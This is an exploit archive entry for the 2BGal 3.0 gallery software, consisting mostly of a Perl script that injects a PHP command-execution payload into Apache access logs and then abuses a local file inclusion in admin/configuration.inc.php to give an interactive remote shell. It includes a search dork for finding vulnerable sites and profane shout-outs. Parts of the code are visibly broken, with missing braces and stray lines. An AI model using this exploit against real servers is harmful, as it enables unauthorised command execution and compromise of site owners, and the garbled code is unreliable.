2BGal 3.0 (admin/configuration.inc.php) Local Inclusion Exploit

Gerardo Vazquez, Eduardo Arriols 01.11.2006 Verified
Web Application Exploits PHP

Exploit Code

# 2BGal 3.0 Remote Command Execution Exploit
# linK : http://www.ben3w.com/multimedia/devphp_2bgal.php
# (c)od3d and f0unded by Kw3[R]Ln from Romanian Security Team a.K.A http://RST-CREW.NET
# Contact: ciriboflacs[AT]YaHOo.com or kw3rln[AT]rst-crew.net
# d0rk: "2BGal 3.0 - Powered by Ben3w"
# File inclusion: www.site.com/<path>/admin/configuration.inc.php?lang=<local/remote file> 
# Shoutz to [Oo], str0ke, th0r and all members of RST 
# PS: fuck CarcaBot ..another lame romanian guy =))

use IO::Socket;
use LWP::Simple;

"../../.. /../../var/www/logs/access_log",

print "[RST] 2BGal 3.0 Remote Command Execution Exploit\n";
print "[RST] need magic_quotes_gpc = off\n";
print "[RST] c0ded by Kw3rLN from Romanian Security Team [ http://rst-crew.net ] \n\n";

if (@ARGV < 3)
    print "[RST] Usage: 2BGal.pl [host] [path] [apache_path]\n\n";
    print "[RST] Apache Path: \n";
    $i = 0;
    { print "[$i] $apache[$i]\n";$i++;}


print "[RST] Injecting some code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
print "[RST] Shell!! write q to exit !\n";
print "[RST] IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";
    print $socket "GET ".$path."/admin/configuration.inc.php?lang=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";    
    while ($raspuns = <$socket>)
        print $raspuns;
    print "[shell] ";
    $cmd = <STDIN>;    

# milw0rm.com [2006-11-01]